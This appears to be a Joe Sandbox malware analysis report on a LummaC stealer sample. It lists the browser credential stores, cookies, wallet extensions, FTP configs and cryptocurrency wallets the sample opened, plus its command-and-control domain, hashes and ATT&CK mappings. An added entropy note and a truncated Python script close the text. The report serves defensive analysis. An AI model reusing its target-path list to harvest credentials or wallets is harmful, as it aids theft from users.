                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1577721314.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1581059278.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1565623403.000000000301F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566593228.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1571636824.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1574086916.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568493204.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585491290.0000000003035000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1572522073.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567592332.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1568118321.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566394877.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1571946572.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566212267.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1570969220.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1567305786.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1574970043.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1576032432.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566302806.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569167137.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1585426357.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1566907407.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1569362451.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
PI1EA8P74K.exe | 87% | ReversingLabs | Win32.Exploit.LummaC |
PI1EA8P74K.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://marbleshinys.click/kw5 | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/apiv | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/;v | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/3w | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/jgES | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/api | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/Kv | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/Sv= | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/ | 0% | Avira URL Cloud | safe |
https://marbleshinys.click:443/apiLSID | 0% | Avira URL Cloud | safe |
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500 | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/(( | 0% | Avira URL Cloud | safe |
marbleshinys.click | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/apiJr | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/7Q | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/pi | 0% | Avira URL Cloud | safe |
http://crl.microsoft(4 | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/api8s | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/apiQ | 0% | Avira URL Cloud | safe |
https://marbleshinys.click/apiP | 0% | Avira URL Cloud | safe |
https://marbleshinys.click:443/api | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
marbleshinys.click | 172.67.148.118 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
curverpluch.lat | false | | high
slipperyloo.lat | false | | high
tentabatte.lat | false | | high
manyrestro.lat | false | | high
https://marbleshinys.click/api | true | Avira URL Cloud: safe | unknown
bashfulacid.lat | false | | high
wordyfindy.lat | false | | high
marbleshinys.click | true | Avira URL Cloud: safe | unknown
shapestickyr.lat | false | | high
talkynicer.lat | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.148.118 | marbleshinys.click | United States | 13335 | CLOUDFLARENETUS | true
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1582432
                                                                                Start date and time:2024-12-30 15:54:09 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 4m 54s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:PI1EA8P74K.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:4de5ddc2a970f98efe99dc22c5b2de78.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                EGA Information:Failed
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Stop behavior analysis, all processes terminated
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target PI1EA8P74K.exe, PID 7952 because there are no executed functions
• Execution Graph export aborted for target dxdiag.exe, PID 8016 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: PI1EA8P74K.exe
Time | Type | Description
09:55:27 | API Interceptor | 8x Sleep call for process: dxdiag.exe modified
                                                                                No context
                                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://aiihsr.com/FloridaCU | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://flowto.it/8tooc2sec?fc=0 | malicious | Unknown | 104.18.35.227
CLOUDFLARENETUS | https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.at | malicious | Unknown | 104.21.20.126
CLOUDFLARENETUS | https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.at | malicious | Unknown | 172.67.192.228
CLOUDFLARENETUS | eXbhgU9.exe | malicious | LummaC | 104.21.18.19
CLOUDFLARENETUS | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3
CLOUDFLARENETUS | Supplier.bat | malicious | Unknown | 172.67.144.225
CLOUDFLARENETUS | Supplier.bat | malicious | LodaRAT, XRed | 172.67.144.225
CLOUDFLARENETUS | NEW-DRAWING-SHEET.bat | malicious | Unknown | 172.67.144.225
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | eXbhgU9.exe | malicious | LummaC | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | universityform.xlsm | malicious | Unknown | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | universityform.xlsm | malicious | Unknown | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | 6QLvb9i.exe | malicious | LummaC | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | lumma.ps1 | malicious | LummaC | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | vlid_acid.exe | malicious | LummaC Stealer | 172.67.148.118
a0e9f5d64349fb13191bc781f81f42e1 | AquaPac.exe | malicious | LummaC Stealer | 172.67.148.118
                                                                                No context
                                                                                No created / dropped files found
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.780281566097344
TrID:
• Win64 Executable GUI (202006/5) 91.80%
• Win64 Executable (generic) (12005/4) 5.46%
• Clipper DOS Executable (2020/12) 0.92%
• Generic Win/DOS Executable (2004/3) 0.91%
• DOS Executable Generic (2002/1) 0.91%
File name: PI1EA8P74K.exe
File size: 12'940'800 bytes
MD5: 4de5ddc2a970f98efe99dc22c5b2de78
SHA1: 2dec8ea0a05c5284f0db5573b3608b64bf94375d
SHA256: d24037cf570f9b0aa4337a9397eca861d2d3b0891b18a924c9ae6ad466a95de4
SHA512: 9d7346b310c1425b826c486773444d68c0cf9df21d1438bffe7eda86c29c09bcd5deb66ad45387b80f06cc261bac6558742c7fde37bb23bbd1987c2f80d3bd82
SSDEEP: 196608:d7WJDMIpNsG+g2t6tDTG1X9TtZf2tXIS867rtnt6rxrWOHecRCwpd:KDMurM6tY0qSXVt6ocoy
TLSH: 1BD6E0298A76C9C4F15BA030FCA614638B71F519DBAD99F936620641CFC7032DFDA239
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....kg.........."..................'.........@..........................................`........................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1400527c8
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x676BCCBE [Wed Dec 25 09:13:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 7bb4e8cef6a9f350a8f5dc71e7b3773c
Instruction (entrypoint, read as x86-64)
Note: the sandbox decoded this 64-bit code in 32-bit mode, which turns every REX.W prefix byte (0x48) into a bogus "dec eax" and splits 64-bit immediates across several fake instructions ("mov ebx, 2DDFA232h / cdq / sub eax, dword ptr [eax] / add byte ptr [eax+3Bh], cl / ret" is really "mov rbx, 2B992DDFA232h / cmp rax, rbx"). The same bytes read as 64-bit code are listed below; call/jump targets and the memory operands are kept as the sandbox printed them. The sequence matches the MSVC CRT entry stub followed by its /GS security-cookie initialisation, which first compares the cookie with the compiler default 2B992DDFA232h.
sub rsp, 28h
call 00007F2448C35FC0h
add rsp, 28h
jmp 00007F2448C35E2Fh
int3
int3
mov qword ptr [rsp+18h], rbx
push rbp
mov rbp, rsp
sub rsp, 30h
mov rax, qword ptr [00BB4910h]
mov rbx, 2B992DDFA232h
cmp rax, rbx
jne 00007F2448C36026h
and qword ptr [rbp+10h], 00000000h
lea rcx, [rbp+10h]
call qword ptr [00A6C3B2h]
mov rax, qword ptr [rbp+10h]
mov qword ptr [rbp-10h], rax
call qword ptr [00A6C334h]
mov eax, eax
xor qword ptr [rbp-10h], rax
call qword ptr [00A6C320h]
mov eax, eax
lea rcx, [rbp+18h]
xor qword ptr [rbp-10h], rax
call qword ptr [00A6C418h]
mov eax, dword ptr [rbp+18h]
lea rcx, [rbp-10h]
shl rax, 20h
xor rax, qword ptr [rbp+18h]
xor rax, qword ptr [rbp-10h]
xor rax, rcx
mov rcx, (64-bit immediate; the report shows only its low dword FFFFFFFFh and the listing is cut off here)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xabe7b0         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc12000         0x1b4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0xc0a000         0x4428        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc13000         0x4c524       .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x9dbd60         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x9d6280         0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xabea78         0x2a0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy              Characteristics
.text     0x1000           0x6878a       0x68800   a368ee41568424c3f3c0b8c18791568d  False     0.5257597562799043    data       6.766936330294184    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata    0x6a000          0xa5925c      0xa59400  4e05a882baaf40f29c81aebd059f8166  unknown   unknown               unknown    unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0xac4000         0x1459c0      0x144000  9dd19c9b2057765d2627aefd888068cf  False     0.4261519820601852    data       4.724497366288815    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata    0xc0a000         0x4428        0x4600    d5adbcaac954a79474c346b366fdea36  False     0.4851004464285714    data       5.714887184964475    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable  0xc0f000         0x100         0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375            data       0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls      0xc10000         0x9           0x200     1f354d76203061bfdd5a53dae48d5435  False     0.033203125           data       0.020393135236084953 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA    0xc11000         0x280         0x400     efa049dab2667534f44e1c44ca45f0db  False     0.28515625            data       3.1757690215177306   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc     0xc12000         0x1b4         0x200     5c9852e239596975f01e05a6614b1fbc  False     0.486328125           data       5.0961877881966595   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc    0xc13000         0x4c524       0x4c600   57341f30cdddff777a6363d9085c0ed4  False     0.015410827536824876  data       5.431258911581813    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
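The Entropy column is the per-section Shannon entropy in bits per byte (8.0 is indistinguishable from random). The sandbox left the .rdata row as unknown, but the rest of the table bounds it: the whole file sits at 7.78 bits per byte, .rdata holds 0xa59400 bytes (10.85 MB of the 12.94 MB file), and every other section is at 6.77 or below, so .rdata itself must be above about 7.2 bits per byte. Read-only data at that density is compressed or encrypted content, which agrees with the "LummaC encrypted strings found" signature. The following Python script is an added example, not part of the Joe Sandbox report or of its tooling: it walks the section headers of a PE image, recomputes that entropy per section from the raw bytes, and flags the two things a triage analyst looks for in this table, sections above 7.0 bits per byte and sections mapped writable and executable (the latter is absent from this sample, whose code section is read/execute only). The PE image it runs on is constructed inline (a two-section PE64 with no optional header, enough for the section walk); the 7.0 threshold is an assumption.

```python
import hashlib
import math
import struct
from collections import Counter

# Section characteristic bits from winnt.h
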